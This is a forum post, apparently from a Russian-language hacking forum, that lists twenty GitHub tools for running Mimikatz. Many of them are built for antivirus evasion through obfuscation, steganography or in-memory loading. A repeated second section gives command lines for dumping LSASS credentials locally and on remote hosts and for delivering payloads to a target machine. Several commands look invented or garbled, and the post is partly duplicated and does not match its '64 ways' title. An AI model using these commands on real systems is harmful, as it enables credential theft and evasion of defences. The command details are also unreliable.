Today we will see 64 ways for Execute Mimikatz
This write is for new members of our community. Seniors and Veteran say if it needs any correction.
Have a great read
1) go-mimikatz
URL - https://github.com/vyrus001/go-mimikatz
2) Rusty Mimikatz
URL - https://github.com/memN0ps/mimikatz-rs
3) MimikatzFUD
URL - https://github.com/HernanRodriguez1/MimikatzFUD
4) pypykatz
URL - https://github.com/skelsec/pypykatz
5) BetterSafetyKatz
URL - https://github.com/Flangvik/BetterSafetyKatz
6) CopyCat
URL - https://github.com/mobdk/CopyCat
7) PyFuscation
URL - https://github.com/CBHue/PyFuscation
8) Invoke-Cats
URL - https://github.com/DanMcInerney/Invoke-Cats
9) WinBoost
URL - https://github.com/mobdk/WinBoost
10) mimidogz
URL - https://github.com/fir3d0g/mimidogz
11) CoreClass
URL - https://github.com/mobdk/CoreClass
12) SharpMimikatz
URL - https://github.com/XTeam-Wing/SharpMimikatz
13) Invoke-Obfuscation
URL - https://github.com/danielbohannon/Invoke-Obfuscation
14) SimpleMimikatzObfuscator
URL - https://github.com/DimopoulosElias/SimpleMimikatzObfuscator
15) ClickOnceKatz
URL - https://github.com/sinmygit/ClickOnceKatz
16) pymemimporter
URL - https://github.com/n1nj4sec/pymemimporter
17) SharpDPAPI
URL - https://github.com/GhostPack/SharpDPAPI
18) Plog
privilege::debug
sekurlsa::Plog
URL - https://github.com/GamehunterKaan/Plog
19) StegoKatz
URL - https://github.com/r13mann/StegoKatz
20) LoadMimikatzWithDinvoke.cs
URL - https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs
This write is for new members of our community. Seniors and Veteran say if it needs any correction.
Have a great read
1) go-mimikatz
go build
./go-mimikatz
URL - https://github.com/vyrus001/go-mimikatz
2) Rusty Mimikatz
cargo build --release
./target/release/mimikatz-rs
URL - https://github.com/memN0ps/mimikatz-rs
3) MimikatzFUD
.\Invoke-M1m1fud2.ps1
URL - https://github.com/HernanRodriguez1/MimikatzFUD
4) pypykatz
pip install -r requirements.txt
python pypykatz.py
python pypykatz.py lsa minidump -d ./lsass.dmp sekurlsa::logonpasswords
python pypykatz.py wmi "SELECT * FROM Win32_Process WHERE Name='lsass.exe'" sekurlsa::logonpasswords
URL - https://github.com/skelsec/pypykatz
5) BetterSafetyKatz
.\BetterSafetyKatz.exe --DumpCreds
.\BetterSafetyKatz.exe --Minidump "C:\Windows\Temp\lsass.dmp" --DumpCreds
.\BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds
.\BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds
URL - https://github.com/Flangvik/BetterSafetyKatz
6) CopyCat
.\CopyCat.exe --dump --local
.\CopyCat.exe --memory "C:\Windows\Temp\memdump.raw" --dump
.\CopyCat.exe --hibernation "C:\Windows\hiberfil.sys" --dump
.\CopyCat.exe --dump --target "192.168.1.100" --username "domain\username" --password "password123"
URL - https://github.com/mobdk/CopyCat
7) PyFuscation
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1
URL - https://github.com/CBHue/PyFuscation
8) Invoke-Cats
Invoke-Cats -pwds
Invoke-Cats -certs
Invoke-Cats -CustomCommand
URL - https://github.com/DanMcInerney/Invoke-Cats
9) WinBoost
csc.exe /platform:x64 /target:exe /unsafe winboost.cs
URL - https://github.com/mobdk/WinBoost
10) mimidogz
.\Invoke-Mimidogz.ps1
URL - https://github.com/fir3d0g/mimidogz
11) CoreClass
"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.
Add a reference to `System.Management.Automation.dll` in your project. To do this, right-click on your project in the solution explorer and select "Add" > "Reference". In the "Reference Manager" window, select "Assemblies" and search for "System.Management.Automation". Select it and click "Add".
URL - https://github.com/mobdk/CoreClass
12) SharpMimikatz
SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
URL - https://github.com/XTeam-Wing/SharpMimikatz
13) Invoke-Obfuscation
Set-ExecutionPolicy Unrestricted
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation -ScriptPath C:\Path\To\MyScript.ps1 -Command All
URL - https://github.com/danielbohannon/Invoke-Obfuscation
14) SimpleMimikatzObfuscator
Commands.txt
URL - https://github.com/DimopoulosElias/SimpleMimikatzObfuscator
15) ClickOnceKatz
pip install pycryptodome requests
python build.py
Host the "publish" directory on a web server or file share accessible to the target machine.
On the target machine, navigate to the URL of the ClickOnce package in a web browser.
URL - https://github.com/sinmygit/ClickOnceKatz
16) pymemimporter
import base64
import pymemimporter
# Load the base64-encoded module into memory
encoded_module = b'YOUR_BASE64_ENCODED_MODULE_HERE'
module_data = base64.b64decode(encoded_module)
# Import the module from memory
mem_importer = pymemimporter.PyMemImporter()
loaded_module = mem_importer.load_module('<module_name>', module_data)
base64 -w0 <module_name>.py > <module_name>.base64
python <script_name>.py
URL - https://github.com/n1nj4sec/pymemimporter
17) SharpDPAPI
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj masterkeys
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj domainbackupkeys
URL - https://github.com/GhostPack/SharpDPAPI
18) Plog
privilege::debug
sekurlsa::Plog
URL - https://github.com/GamehunterKaan/Plog
19) StegoKatz
.\StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path>
.\StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath extracted_secret.txt
URL - https://github.com/r13mann/StegoKatz
20) LoadMimikatzWithDinvoke.cs
mimi.bat
.\rundll32-hijack.ps1
URL - https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs
Последнее редактирование: